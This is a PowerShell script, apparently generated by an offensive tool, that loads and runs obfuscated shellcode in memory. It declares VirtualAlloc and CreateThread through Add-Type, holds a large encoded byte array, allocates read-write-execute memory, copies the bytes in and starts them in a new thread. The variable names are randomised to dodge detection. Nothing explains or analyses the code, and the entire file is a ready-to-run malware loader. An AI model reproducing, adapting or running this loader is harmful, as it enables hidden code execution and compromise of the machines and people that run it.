$YpzqRmMjc = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$ffnMVgDTbxmHMD = Add-Type -memberDefinition $YpzqRmMjc -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $vChzLTnFvx = 0xd9,0xeb,0xd9,0x74,0x24,0xf4,0xb8,0xbb,0x39,0x1c,0x94,0x5b,0x33,0xc9,0xb1,0x8f,0x31,0x43,0x17,0x3,0x43,0x17,0x83,0x78,0x3d,0xfe,0x61,0x82,0xd6,0x71,0x89,0x7a,0x27,0xee,0xbb,0xa8,0x43,0x65,0xe9,0x7c,0x5,0x9c,0x85,0x2e,0x19,0xd4,0xc8,0xda,0xaa,0x98,0xc4,0xed,0x1b,0x16,0x33,0xc0,0x9c,0x96,0xfb,0x8e,0x5f,0xb8,0x87,0xcc,0xb3,0x1a,0xb9,0x1f,0xc6,0x5b,0xfe,0xd6,0xac,0xb4,0x52,0x63,0x1c,0x5b,0x4,0xf8,0xe3,0x67,0xab,0x2e,0x68,0xd7,0xd3,0x4b,0xaf,0xac,0x6f,0x52,0xe0,0xc6,0x28,0x74,0x50,0xd8,0x1b,0xff,0x18,0xc2,0x1e,0x36,0xec,0xce,0x69,0x43,0x39,0xa4,0x6b,0x85,0x73,0x45,0x5a,0xe9,0xd8,0x78,0x52,0xe4,0x21,0xbc,0x55,0x16,0x54,0xb6,0xa5,0xab,0x6f,0xd,0xd7,0x77,0xe5,0x92,0x7f,0xfc,0x5d,0x77,0x81,0xd1,0x38,0xfc,0x8d,0x9e,0x4f,0x5a,0x92,0x21,0x83,0xd0,0xae,0xaa,0x22,0x37,0x27,0xe8,0x0,0x93,0x63,0xab,0x29,0x82,0xc9,0x1a,0x55,0xd4,0xb6,0xc3,0xf3,0x9e,0x55,0x12,0x83,0x5e,0xa6,0x1b,0xd9,0xc8,0x37,0x86,0x96,0x8,0xa0,0x3f,0x3e,0x67,0x59,0xeb,0xa8,0x3b,0xee,0x35,0x2e,0x3b,0xc5,0x8,0xeb,0x90,0xb5,0x39,0x58,0x44,0xd2,0x83,0x5e,0x6a,0x22,0xb6,0x31,0x10,0x4b,0x24,0xa2,0x85,0xa4,0x81,0x14,0x76,0x9b,0xc1,0x3f,0x1f,0xb5,0x75,0xaf,0xa8,0x3a,0x55,0x61,0x3,0x9d,0xa3,0x53,0x9a,0xe6,0xeb,0xff,0xae,0x71,0x8f,0x9a,0x20,0xf6,0x60,0x52,0x93,0xc6,0x45,0xbc,0x99,0x50,0x83,0x8d,0x6c,0xb3,0xc3,0xc4,0xae,0xa7,0x4a,0x7c,0xca,0x17,0xcb,0xe7,0x77,0x33,0xbc,0xe7,0x1f,0xf9,0x14,0x91,0x78,0x2,0x4d,0x32,0xd4,0x97,0x6e,0xe6,0x89,0xf,0xcb,0x9,0x2e,0xd0,0xc3,0x1a,0x2f,0xd0,0x13,0x34,0x64,0xa9,0x56,0x7a,0x4f,0x7c,0x2a,0x3f,0xeb,0x4c,0xb8,0xd6,0xaa,0xff,0x72,0x41,0x2a,0x78,0xe9,0xa9,0x8d,0x39,0x81,0xaa,0xba,0xf2,0x6c,0x67,0x37,0x70,0xfc,0x1d,0xe3,0x20,0x47,0xbd,0x47,0xb6,0x21,0x23,0x1a,0x6f,0xc5,0xeb,0xd4,0xcd,0x64,0xc1,0xbf,0xa5,0xc9,0x50,0x16,0x1c,0x8d,0x38,0xdf,0xcc,0x79,0xcb,0x97,0x6a,0xb7,0x1,0x11,0x14,0xfc,0x1,0x51,0xbc,0x6e,0xff,0xa2,0x19,0x14,0xaa,0xf2,0xf0,0xb2,0x1a,0x81,0x70,0x18,0xe9,0x38,0x27,0xd6,0xa5,0xb1,0xf7,0x8a,0x4,0x50,0x88,0xd,0x50,0xd4,0xd,0x88,0xc7,0xdd,0xa2,0xab,0x86,0x7b,0x55,0x7b,0xa,0xe0,0x88,0x33,0x9a,0x9b,0xbb,0x90,0x57,0x2f,0x5,0x5b,0xd3,0xfa,0x17,0x54,0x97,0x5b,0xae,0xa9,0x57,0x34,0x26,0x9a,0xde,0x2b,0x70,0xdb,0x34,0xda,0xbb,0x70,0xdf,0xdd,0x71,0x9e,0x9b,0x8d,0x26,0xd,0xf3,0x62,0x9f,0xd9,0x10,0xd1,0x31,0x22,0x18,0xf,0xdb,0x3e,0xec,0xef,0x8c,0x3e,0xc3,0xf,0x4d,0xb7,0xc4,0x7a,0x49,0x97,0x6e,0x64,0x7,0x7f,0x1a,0xdc,0x39,0xf9,0x1b,0x35,0x16,0x56,0xb7,0xe5,0xcf,0x30,0x1a,0xc,0xe8,0xbb,0x9b,0xc5,0x8d,0xfb,0x11,0xf2,0xe5,0x73,0xca,0xfa,0xf5,0xeb,0xa9,0xa,0xc0,0xb,0xce,0x3e,0x64,0xbe,0xfc,0x29,0x30,0x40,0xff,0xa9,0xad,0x0,0x97,0xa9,0x21,0x80,0x67,0xc2,0x41,0x80,0x27,0x12,0x11,0xe8,0xff,0xb6,0xc6,0xd,0x0,0x63,0x7b,0x9e,0xac,0x5,0x9b,0x77,0x3b,0x16,0x44,0x77,0xbb,0x45,0xd2,0x1f,0xa9,0xff,0x53,0x3d,0x32,0x2a,0xe6,0x1,0xb9,0x1a,0x62,0x86,0x43,0x66,0xf0,0x48,0x36,0x8d,0xa3,0x8b,0xe6,0xa5,0x3f,0xf4,0xe6,0xc9,0xf1,0x3d,0x28,0x18,0xc0,0x74,0x64,0x56,0x16,0x44,0x56,0xa4,0x66,0x9c,0xa6,0x73,0x76,0x69,0x4,0xd5,0x1d,0x91,0x1a,0x25,0x34


$rhLaoeyrn = $ffnMVgDTbxmHMD::VirtualAlloc(0,[Math]::Max($vChzLTnFvx.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($vChzLTnFvx,0,$rhLaoeyrn,$vChzLTnFvx.Length)

$ffnMVgDTbxmHMD::CreateThread(0,0,$rhLaoeyrn,0,0,0)
